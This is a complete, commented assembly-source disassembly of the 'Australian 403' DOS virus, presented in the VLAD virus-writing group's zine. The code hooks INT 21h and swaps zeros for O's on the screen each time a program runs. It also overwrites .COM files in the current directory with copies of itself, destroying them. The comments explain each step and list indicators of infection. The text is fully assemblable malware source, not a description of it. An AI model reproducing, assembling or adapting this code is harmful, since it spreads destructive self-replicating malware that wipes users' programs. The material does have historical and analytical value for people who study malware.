Virus Labs & Distribution
VLAD #3 - Aust403 Disasm


;                             Darkman/VLAD
;                           Proudly Presents
;                    Disassembly of Australian 403


;-----------------------------------------------------------------------
; Australian 403 - data area (MASM-style Intel syntax, 16-bit real mode)
; Single-segment COM image. Everything below is part of the 403-byte
; (193h) file the virus writes when it infects, so the "variables" are
; embedded in the infected file, not in separate storage.
;-----------------------------------------------------------------------
aussie403    segment
             assume  cs:aussie403,ds:aussie403,es:aussie403
             org     100h                ; Origin of COM-file (PSP occupies 0-0FFh)

code:
             jmp     resident            ; Entry point: install the INT 21h hook and go resident
stackptr     dw      ?                   ; Caller's SP, saved on every INT 21h by virusint21
stackseg     dw      ?                   ; Caller's SS
accumulator  dw      ?                   ; Caller's AX (AH = requested DOS function)
message      db      00h,0dh,0ah         ; Never displayed by this code; only used as a stack base (SP = message+4Eh)
             db      'ScUD 1991!'        ; Message by the author - usable as a scan string for infected files
             db      0dh,0ah
stackbytes   db      41h dup(?)          ; Private stack (65 bytes); virusint21's SP lands at its top, just below int21off
int21off     dw      ?                   ; Offset of original INT 21h handler  } together the far pointer used by
int21seg     dw      ?                   ; Segment of original INT 21h handler } "call/jmp dword ptr cs:int21off"
filespec     db      '*.COM',00h         ; Find-first pattern: no path, so only the current directory is searched
filehandle   dw      ?                   ; Handle returned by AH=3Ch for the file being overwritten

dta:                                     ; Disk transfer area (DTA) used for find-first/next, inside the virus body
drive        db      ?                   ; Drive letter
searchtemp   db      0bh dup(?)          ; Search template (8.3 name)
reserved     db      09h dup (?)         ; Reserved by DOS
fileattr     dw      ?                   ; File attribute (NOTE: the documented DOS layout has a 1-byte attribute at 15h and a word time at 16h;
filetime     db      ?                   ;  the widths here are swapped, but filedate/filesize/filename still sit at their documented offsets)
filedate     dw      ?                   ; File date
filesize     dd      ?                   ; Filesize at DTA offset 1Ah - the only DTA field the code reads (low word vs 0193h)
filename     db      0dh dup (?)         ; ASCIIZ filename + extension at DTA offset 1Eh, passed to AH=3Ch

fill         db      04h dup (?)         ; Fill of virus - presumably padding so codeend-code comes out at 403 bytes; not referenced

;-----------------------------------------------------------------------
; virusint21 - resident INT 21h hook of Australian 403
; Reached through the vector installed by "resident"; entered like any
; INT 21h, with the caller's flags/CS/IP already on the caller's stack.
; In:    AH = DOS function, other registers as the caller left them
; Out:   every call is chained to the original handler (int21off/int21seg)
;        with SS:SP and AX restored, so the requested function still runs.
;        For AH=4Bh (EXEC) the payload and infection run first.
; Side effects on AH=4Bh: text screen at B800h rewritten ('0' -> 'O'),
;        the caller's DTA is moved (AH=1Ah) and not restored, and the
;        first *.COM in the current directory whose size is not 403
;        bytes is overwritten with the virus.
; Stack: switches to the private stack at message+4Eh (inside
;        stackbytes); uses at most 8 pushes plus pushf/far call.
; Indicators: INT 21h vector pointing into a 403-byte image containing
;        'ScUD 1991!'; zeros turning into O's on screen when programs start.
;-----------------------------------------------------------------------
virusint21   proc    near                ; Interrupt 21h of Australian 403
             mov     cs:stackptr,sp      ; Save caller's stack pointer
             mov     cs:stackseg,ss      ; Save caller's stack segment
             mov     cs:accumulator,ax   ; Save AX (AH = requested DOS function)
             lea     sp,message          ; SP = offset of message ...
             nop
             add     sp,4eh              ; ... + 4Eh = top of stackbytes by the layout above

             mov     ax,cs
             mov     ss,ax               ; SS = CS: the stack now lives inside the virus image
             mov     ax,cs:accumulator   ; Restore AX for the function test
             cmp     ah,4bh              ; Load or execute a program (EXEC)?
             je      service4b           ; Yes: payload + infection before passing the call on
             jmp     virusexit           ; Any other function: pass straight through
service4b:
             push    ax                  ; Save AX at stack
             push    bx                  ; Save BX at stack
             push    cx                  ; Save CX at stack
             push    dx                  ; Save DX at stack
             push    ds                  ; Save DS at stack
             push    es                  ; Save ES at stack
             push    si                  ; Save SI at stack
             push    di                  ; Save DI at stack

             mov     ax,0b800h
             mov     ds,ax               ; DS = text color screen segment (B800h)
             mov     bx,00h              ; BX = byte offset into the screen buffer
chkscreen:
             mov     al,[bx]             ; Read a character cell (even offsets only; attribute bytes are skipped)
             cmp     al,'0'              ; Zero?
             jne     fuckscreen          ; Not a '0': write it back unchanged
             mov     al,'O'              ; Payload: convert zeros to letter O's
fuckscreen:
             mov     [bx],al             ; Write to screen (every cell is rewritten, changed or not)
             inc     bx                  ; Step 2 bytes = one character cell
             inc     bx
             cmp     bx,1000h            ; 1000h bytes = 2048 cells, slightly more than one 80x25 page
             jne     chkscreen           ; Loop until the whole range is done

             mov     ax,cs
             mov     ds,ax               ; DS = CS for the DOS calls below
             lea     dx,dta              ; DS:DX = dta inside the virus image
             mov     ah,1ah              ; Set disk transfer area (the caller's DTA is not restored afterwards)
             pushf                       ; pushf + far call = emulate INT 21h into the original handler
             call    dword ptr cs:int21off

             mov     ax,cs
             mov     ds,ax
             lea     dx,filespec         ; DS:DX = '*.COM' (current directory only; no path)
             mov     cx,00h              ; Search attribute 0: hidden/system/directory entries are excluded
             mov     ah,4eh              ; Find first matching file
             pushf                       ; Save flags at stack
             call    dword ptr cs:int21off
             jc      infectexit          ; No match / error: nothing to infect

             cmp     word ptr [offset filesize],0193h   ; Low word of size == 403 (the virus's own length) => already infected
             jne     infect              ; Any other size: overwrite this file
findnext:
             mov     ah,4fh              ; Find next matching file (DTA still points at dta)
             pushf                       ; Save flags at stack
             call    dword ptr cs:int21off
             jc      infectexit          ; Directory exhausted / error: exit

             cmp     word ptr [offset filesize],0193h   ; Same 403-byte marker test
             jne     infect              ; Not infected? Jump to infect
             jmp     short findnext
infect:
             mov     ax,cs
             mov     ds,ax
             lea     dx,filename         ; DS:DX = ASCIIZ name from the DTA
             mov     ah,3ch              ; Create/truncate the file: the host program is destroyed, nothing of it is kept
             mov     cx,00h              ; Attribute 0 (normal) for the new file
             pushf                       ; Save flags at stack
             call    dword ptr cs:int21off
             mov     filehandle,ax       ; Save file handle (CF is not tested here, so on failure an error code is stored instead)

             mov     ax,cs
             mov     ds,ax
             mov     bx,filehandle       ; Load file handle
             mov     cx,(codeend-code)   ; Write 403 bytes: the whole image from "code" to "codeend"
             lea     dx,code             ; DS:DX = start of the virus image (offset 100h)
             mov     ah,40h              ; Write to file -> the file becomes an exact 403-byte copy of the virus
             pushf                       ; Save flags at stack
             call    dword ptr cs:int21off

             mov     bx,filehandle       ; Load file handle
             mov     ah,3eh              ; Close file; only one file is infected per EXEC call
             pushf                       ; Save flags at stack
             call    dword ptr cs:int21off
infectexit:
             pop     di                  ; Load DI from stack
             pop     si                  ; Load SI from stack
             pop     es                  ; Load ES from stack
             pop     ds                  ; Load DS from stack
             pop     dx                  ; Load DX from stack
             pop     cx                  ; Load CX from stack
             pop     bx                  ; Load BX from stack
             pop     ax                  ; Load AX from stack
virusexit:
             mov     sp,cs:stackptr      ; Back to the caller's stack
             mov     ax,cs:stackseg
             mov     ss,ax               ; Load stack segment
             mov     ax,cs:accumulator   ; Caller's AX (function number) restored
             jmp     dword ptr cs:int21off ; Chain to the original handler; its IRET returns to the caller
             endp

;-----------------------------------------------------------------------
; resident - entry point of an infected (i.e. fully overwritten) .COM
; Because the host was destroyed at infection time, this is all an
; infected file does: hook INT 21h and stay resident. Nothing checks
; whether a copy is already installed, so each launch of an infected
; file installs another hook in front of the previous one.
; Exit:  INT 27h keeping 293h bytes = PSP (100h) + 193h (403) of code.
;-----------------------------------------------------------------------
resident:
             mov     ax,cs
             mov     ds,ax               ; DS = ES = SS = CS (single-segment COM)
             mov     es,ax
             mov     ss,ax               ; SP is not touched here

             mov     ax,3521h            ; Get address of interrupt 21h -> ES:BX
             int     21h                 ; Do it!
             mov     int21off,bx         ; Save offset of the original handler
             mov     int21seg,es         ; Save segment; int21off/int21seg form the far pointer virusint21 chains to

             mov     ax,cs
             mov     ds,ax               ; AH=25h takes the new vector in DS:DX
             mov     ax,2521h            ; Set address of interrupt 21h
             lea     dx,virusint21       ; DS:DX = CS:virusint21
             int     21h                 ; Do it! From here on every INT 21h passes through virusint21

             mov     dx,293h             ; Keep 293h = 659 bytes resident: PSP (100h) + 193h (403) bytes of virus
             int     27h                 ; Terminate but stay resident
codeend:                                 ; codeend-code = 193h = 403 bytes: the size written at infection and the "already infected" marker

aussie403    ends
end          code                        ; Entry point is "code" (jmp resident)

